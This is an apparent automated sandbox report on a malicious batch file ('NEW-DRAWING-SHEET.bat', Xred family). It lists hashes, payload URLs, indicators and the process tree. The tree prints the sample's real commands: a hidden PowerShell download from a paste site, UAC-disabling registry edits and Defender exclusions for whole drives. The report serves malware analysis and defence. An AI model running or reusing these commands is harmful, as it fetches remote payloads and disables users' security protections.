Analysis
-
max time kernel
150s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
30-12-2024 10:28
Static task
static1
Behavioral task
behavioral1
Sample
NEW-DRAWING-SHEET.bat
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
NEW-DRAWING-SHEET.bat
Resource
win10v2004-20241007-en
General
-
Target
NEW-DRAWING-SHEET.bat
-
Size
41KB
-
MD5
6b9cf24f2b691606642bd18bf2227a62
-
SHA1
046ab52fa2f7fd4a6487d3ddcd58dd7f08f157bc
-
SHA256
f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1
-
SHA512
db5789e0e0b67eba4030d781f3fedad503bcc9f5a3d33e10a6b5081594da87bc586feeb2091739db007004422180c5f296352b9aa93e4fa6386e49babad2fc8e
-
SSDEEP
768:zQOoRvxAZOBu7i19ruE0qRsvAD/CPvmaFnnjZA9fhyjtA8ThOdeABXr1Rbtonrsr:UOoRvxAZOBu+19ruE0qRsvAD/CPvmaFO
Malware Config
Extracted
https://paste.fo/raw/a1af5a4d0301
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" reg.exe -
Xred family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 7 4504 powershell.exe -
pid Process 2584 powershell.exe 2548 powershell.exe 4136 powershell.exe 3728 powershell.exe 4692 powershell.exe 4948 powershell.exe 4544 powershell.exe 4504 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation DOC.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation Synaptics.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MRIYKG.lnk ._cache_DOC.exe -
Executes dropped EXE 6 IoCs
pid Process 1876 DOC.exe 4572 ._cache_DOC.exe 1732 Synaptics.exe 5084 ._cache_Synaptics.exe 1884 CHVALO.exe 4804 CHVALO.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" DOC.exe Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MRIYKG = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windata\\CHVALO.exe\"" ._cache_DOC.exe -
Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs
Possible Turn off User Account Control's privilege elevation for standard users.
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 17 raw.githubusercontent.com 20 raw.githubusercontent.com -
AutoIT Executable 17 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/memory/5084-365-0x0000000000520000-0x0000000000724000-memory.dmp autoit_exe behavioral2/memory/5084-372-0x0000000000520000-0x0000000000724000-memory.dmp autoit_exe behavioral2/memory/4572-422-0x00000000002E0000-0x00000000004E4000-memory.dmp autoit_exe behavioral2/memory/4572-423-0x00000000002E0000-0x00000000004E4000-memory.dmp autoit_exe behavioral2/memory/4572-428-0x00000000002E0000-0x00000000004E4000-memory.dmp autoit_exe behavioral2/memory/4572-430-0x00000000002E0000-0x00000000004E4000-memory.dmp autoit_exe behavioral2/memory/1884-435-0x00000000000E0000-0x00000000002E4000-memory.dmp autoit_exe behavioral2/memory/4572-436-0x00000000002E0000-0x00000000004E4000-memory.dmp autoit_exe behavioral2/memory/4572-438-0x00000000002E0000-0x00000000004E4000-memory.dmp autoit_exe behavioral2/memory/4572-440-0x00000000002E0000-0x00000000004E4000-memory.dmp autoit_exe behavioral2/memory/4572-465-0x00000000002E0000-0x00000000004E4000-memory.dmp autoit_exe behavioral2/memory/4572-467-0x00000000002E0000-0x00000000004E4000-memory.dmp autoit_exe behavioral2/memory/4572-469-0x00000000002E0000-0x00000000004E4000-memory.dmp autoit_exe behavioral2/memory/4804-473-0x00000000000E0000-0x00000000002E4000-memory.dmp autoit_exe behavioral2/memory/4572-474-0x00000000002E0000-0x00000000004E4000-memory.dmp autoit_exe behavioral2/memory/4572-476-0x00000000002E0000-0x00000000004E4000-memory.dmp autoit_exe behavioral2/memory/4572-478-0x00000000002E0000-0x00000000004E4000-memory.dmp autoit_exe -
resource yara_rule behavioral2/files/0x0007000000023c8e-174.dat upx behavioral2/memory/4572-239-0x00000000002E0000-0x00000000004E4000-memory.dmp upx behavioral2/memory/5084-365-0x0000000000520000-0x0000000000724000-memory.dmp upx behavioral2/memory/5084-372-0x0000000000520000-0x0000000000724000-memory.dmp upx behavioral2/memory/4572-422-0x00000000002E0000-0x00000000004E4000-memory.dmp upx behavioral2/memory/4572-423-0x00000000002E0000-0x00000000004E4000-memory.dmp upx behavioral2/memory/4572-428-0x00000000002E0000-0x00000000004E4000-memory.dmp upx behavioral2/memory/4572-430-0x00000000002E0000-0x00000000004E4000-memory.dmp upx behavioral2/memory/1884-434-0x00000000000E0000-0x00000000002E4000-memory.dmp upx behavioral2/memory/1884-435-0x00000000000E0000-0x00000000002E4000-memory.dmp upx behavioral2/memory/4572-436-0x00000000002E0000-0x00000000004E4000-memory.dmp upx behavioral2/memory/4572-438-0x00000000002E0000-0x00000000004E4000-memory.dmp upx behavioral2/memory/4572-440-0x00000000002E0000-0x00000000004E4000-memory.dmp upx behavioral2/memory/4572-465-0x00000000002E0000-0x00000000004E4000-memory.dmp upx behavioral2/memory/4572-467-0x00000000002E0000-0x00000000004E4000-memory.dmp upx behavioral2/memory/4572-469-0x00000000002E0000-0x00000000004E4000-memory.dmp upx behavioral2/memory/4804-472-0x00000000000E0000-0x00000000002E4000-memory.dmp upx behavioral2/memory/4804-473-0x00000000000E0000-0x00000000002E4000-memory.dmp upx behavioral2/memory/4572-474-0x00000000002E0000-0x00000000004E4000-memory.dmp upx behavioral2/memory/4572-476-0x00000000002E0000-0x00000000004E4000-memory.dmp upx behavioral2/memory/4572-478-0x00000000002E0000-0x00000000004E4000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_DOC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WSCript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CHVALO.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CHVALO.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DOC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Delays execution with timeout.exe 2 IoCs
pid Process 4568 timeout.exe 4268 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE -
Kills process with taskkill 12 IoCs
pid Process 1832 taskkill.exe 3284 taskkill.exe 4724 taskkill.exe 2204 taskkill.exe 4600 taskkill.exe 456 taskkill.exe 1964 taskkill.exe 3332 taskkill.exe 3896 taskkill.exe 1628 taskkill.exe 396 taskkill.exe 3588 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ DOC.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe -
Modifies registry key 1 TTPs 12 IoCs
pid Process 2492 reg.exe 3608 reg.exe 228 reg.exe 4144 reg.exe 5020 reg.exe 2108 reg.exe 1368 reg.exe 1040 reg.exe 3908 reg.exe 4280 reg.exe 3648 reg.exe 2760 reg.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\localhost\root\SecurityCenter2 ._cache_DOC.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2212 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2044 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4504 powershell.exe 4504 powershell.exe 2584 powershell.exe 2584 powershell.exe 2548 powershell.exe 2548 powershell.exe 1112 msedge.exe 1112 msedge.exe 2948 msedge.exe 2948 msedge.exe 4136 powershell.exe 4136 powershell.exe 4136 powershell.exe 3728 powershell.exe 3728 powershell.exe 3728 powershell.exe 4692 powershell.exe 4692 powershell.exe 4692 powershell.exe 4948 powershell.exe 4948 powershell.exe 1384 identity_helper.exe 1384 identity_helper.exe 4948 powershell.exe 4544 powershell.exe 4544 powershell.exe 4544 powershell.exe 2416 msedge.exe 2416 msedge.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe 4572 ._cache_DOC.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4572 ._cache_DOC.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4504 powershell.exe Token: SeDebugPrivilege 2584 powershell.exe Token: SeDebugPrivilege 2548 powershell.exe Token: SeDebugPrivilege 4136 powershell.exe Token: SeDebugPrivilege 3728 powershell.exe Token: SeDebugPrivilege 4692 powershell.exe Token: SeDebugPrivilege 4948 powershell.exe Token: SeDebugPrivilege 4544 powershell.exe Token: SeRestorePrivilege 2376 7z.exe Token: 35 2376 7z.exe Token: SeSecurityPrivilege 2376 7z.exe Token: SeSecurityPrivilege 2376 7z.exe Token: SeDebugPrivilege 396 taskkill.exe Token: SeDebugPrivilege 3588 taskkill.exe Token: SeDebugPrivilege 4600 taskkill.exe Token: SeDebugPrivilege 456 taskkill.exe Token: SeDebugPrivilege 1964 taskkill.exe Token: SeDebugPrivilege 3332 taskkill.exe Token: SeDebugPrivilege 1832 taskkill.exe Token: SeDebugPrivilege 3896 taskkill.exe Token: SeDebugPrivilege 3284 taskkill.exe Token: SeDebugPrivilege 4724 taskkill.exe Token: SeDebugPrivilege 1628 taskkill.exe Token: SeDebugPrivilege 2204 taskkill.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe 2948 msedge.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2044 EXCEL.EXE 2044 EXCEL.EXE 2044 EXCEL.EXE 2044 EXCEL.EXE 2044 EXCEL.EXE 2044 EXCEL.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4736 wrote to memory of 2836 4736 cmd.exe 83 PID 4736 wrote to memory of 2836 4736 cmd.exe 83 PID 2836 wrote to memory of 4504 2836 cmd.exe 85 PID 2836 wrote to memory of 4504 2836 cmd.exe 85 PID 2836 wrote to memory of 2584 2836 cmd.exe 86 PID 2836 wrote to memory of 2584 2836 cmd.exe 86 PID 2584 wrote to memory of 1988 2584 powershell.exe 87 PID 2584 wrote to memory of 1988 2584 powershell.exe 87 PID 1988 wrote to memory of 2492 1988 cmd.exe 89 PID 1988 wrote to memory of 2492 1988 cmd.exe 89 PID 1988 wrote to memory of 3608 1988 cmd.exe 90 PID 1988 wrote to memory of 3608 1988 cmd.exe 90 PID 1988 wrote to memory of 1368 1988 cmd.exe 91 PID 1988 wrote to memory of 1368 1988 cmd.exe 91 PID 1988 wrote to memory of 4144 1988 cmd.exe 92 PID 1988 wrote to memory of 4144 1988 cmd.exe 92 PID 1988 wrote to memory of 228 1988 cmd.exe 93 PID 1988 wrote to memory of 228 1988 cmd.exe 93 PID 1988 wrote to memory of 1040 1988 cmd.exe 94 PID 1988 wrote to memory of 1040 1988 cmd.exe 94 PID 1988 wrote to memory of 3908 1988 cmd.exe 95 PID 1988 wrote to memory of 3908 1988 cmd.exe 95 PID 1988 wrote to memory of 5020 1988 cmd.exe 96 PID 1988 wrote to memory of 5020 1988 cmd.exe 96 PID 1988 wrote to memory of 2108 1988 cmd.exe 97 PID 1988 wrote to memory of 2108 1988 cmd.exe 97 PID 2836 wrote to memory of 2948 2836 cmd.exe 98 PID 2836 wrote to memory of 2948 2836 cmd.exe 98 PID 1988 wrote to memory of 4280 1988 cmd.exe 100 PID 1988 wrote to memory of 4280 1988 cmd.exe 100 PID 1988 wrote to memory of 3648 1988 cmd.exe 101 PID 1988 wrote to memory of 3648 1988 cmd.exe 101 PID 1988 wrote to memory of 2760 1988 cmd.exe 102 PID 1988 wrote to memory of 2760 1988 cmd.exe 102 PID 2836 wrote to memory of 4568 2836 cmd.exe 103 PID 2836 wrote to memory of 4568 2836 cmd.exe 103 PID 2948 wrote to memory of 4164 2948 msedge.exe 104 PID 2948 wrote to memory of 4164 2948 msedge.exe 104 PID 1988 wrote to memory of 2548 1988 cmd.exe 105 PID 1988 wrote to memory of 2548 1988 cmd.exe 105 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106 PID 2948 wrote to memory of 4996 2948 msedge.exe 106
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NEW-DRAWING-SHEET.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\NEW-DRAWING-SHEET.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\NEW-DRAWING-SHEET.bat'))"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /4⤵
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:2492
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f5⤵
- Hijack Execution Flow: Executable Installer File Permissions Weakness
- Modifies registry key
PID:3608
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:1368
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:4144
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:228
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:1040
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:3908
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:5020
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:2108
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f5⤵
- Modifies registry key
PID:4280
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:3648
-
-
C:\Windows\system32\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:2760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4544
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd9cfd46f8,0x7ffd9cfd4708,0x7ffd9cfd47184⤵PID:4164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,6338999586993017818,14293051771361784872,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:24⤵PID:4996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,6338999586993017818,14293051771361784872,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:1112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,6338999586993017818,14293051771361784872,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:84⤵PID:4772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6338999586993017818,14293051771361784872,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:14⤵PID:1648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,6338999586993017818,14293051771361784872,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:14⤵PID:4200
-
-
